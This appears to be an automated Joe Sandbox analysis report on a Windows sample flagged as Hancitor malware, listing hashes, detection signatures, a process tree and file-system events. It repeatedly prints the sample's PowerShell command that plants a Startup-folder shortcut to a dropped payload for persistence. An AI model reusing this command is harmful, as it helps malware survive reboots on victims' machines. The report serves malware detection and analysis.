Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sBvrNv0wtb.exe

Overview

General Information

Sample name:sBvrNv0wtb.exe
renamed because original name is a hash value
Original sample name:dc1bcd4074651a3795b8b21e93223537f5067890f1ac68e9f15d3a3dc7dd3056.exe
Analysis ID:1637507
MD5:da61dc10ea55e0c0376fb23ce9907976
SHA1:ce3595e012c7106d3e9ffcea954ecb342efddcd5
SHA256:dc1bcd4074651a3795b8b21e93223537f5067890f1ac68e9f15d3a3dc7dd3056
Tags:exeNATIONALCARECONSORTIUMLTDuser-JAMESWT_MHT
Infos:

Detection

Hancitor
Score:48
Range:0 - 100
Confidence:100%

Compliance

Score:64
Range:0 - 100

Signatures

Yara detected Hancitor
Powershell creates an autostart link
Query firmware table information (likely to detect VMs)
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • sBvrNv0wtb.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\sBvrNv0wtb.exe" MD5: DA61DC10EA55E0C0376FB23CE9907976)
    • 872C.tmp (PID: 7692 cmdline: C:\Users\user\AppData\Local\Temp\872C.tmp MD5: 29D5D38D66B57BBC99F833265592278F)
      • 872C.tmp (PID: 7708 cmdline: 872C.tmp RELAUNCHED MD5: 29D5D38D66B57BBC99F833265592278F)
        • OfficeClickToRun.exe (PID: 1332 cmdline: OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=CDN sourcetype=CDN O365HomePremRetail.excludedapps=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True scenario=CLIENTUPDATE MD5: 75F42872C0302D36A1E3BB5C7928FC02)
        • OfficeClickToRun.exe (PID: 4892 cmdline: OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=CDN sourcetype.16=CDN O365HomePremRetail.excludedapps.16=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True MD5: 33F980B29BC3D0B5B536646573D8A63F)
    • 918D.tmp (PID: 7772 cmdline: C:\Users\user\AppData\Local\Temp\918D.tmp MD5: 11564DDB77680B81999B6837CEEF3105)
      • powershell.exe (PID: 1532 cmdline: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • OpenWith.exe (PID: 2752 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
HancitorHancitor(aka Chanitor) emerged in 2013 which spread via social usering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: sBvrNv0wtb.exe PID: 7632JoeSecurity_HancitorYara detected HancitorJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", CommandLine: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\918D.tmp, ParentImage: C:\Users\user\AppData\Local\Temp\918D.tmp, ParentProcessId: 7772, ParentProcessName: 918D.tmp, ProcessCommandLine: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", ProcessId: 1532, ProcessName: powershell.exe
    Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
    Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AsMus.lnk
    Sigma detected: Startup Folder File Write
    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AsMus.lnk
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", CommandLine: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\918D.tmp, ParentImage: C:\Users\user\AppData\Local\Temp\918D.tmp, ParentProcessId: 7772, ParentProcessName: 918D.tmp, ProcessCommandLine: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", ProcessId: 1532, ProcessName: powershell.exe
    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", CommandLine: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\918D.tmp, ParentImage: C:\Users\user\AppData\Local\Temp\918D.tmp, ParentProcessId: 7772, ParentProcessName: 918D.tmp, ProcessCommandLine: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() ", ProcessId: 1532, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-13T17:18:18.388255+010020283713Unknown Traffic192.168.2.65461413.107.246.67443TCP
    2025-03-13T17:18:26.520975+010020283713Unknown Traffic192.168.2.65461913.107.246.67443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    Location Tracking

    barindex
    Yara detected Hancitor
    Source: Yara matchFile source: Process Memory Space: sBvrNv0wtb.exe PID: 7632, type: MEMORYSTR

    Compliance

    barindex
    Creates a directory in C:\Program Files
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\UpdatesJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45AJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l2-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-localization-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-synch-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-xstate-l2-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-math-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-private-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-process-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-string-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-time-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ApiClient.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVCatalog.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\appvcleaner.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVClient.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVClientIsv.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVFileSystemMetadata.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIntegration.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvApi.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvStreamingManager.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvSubsystemController.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems32.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64_arm64x.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvVirtualization.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVManifest.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVOrchestration.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVPolicy.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVScripting.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVShNotify.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R32.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r32werhandler.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R64.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r64werhandler.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RHeartbeatConfig.xmlJump to behavior
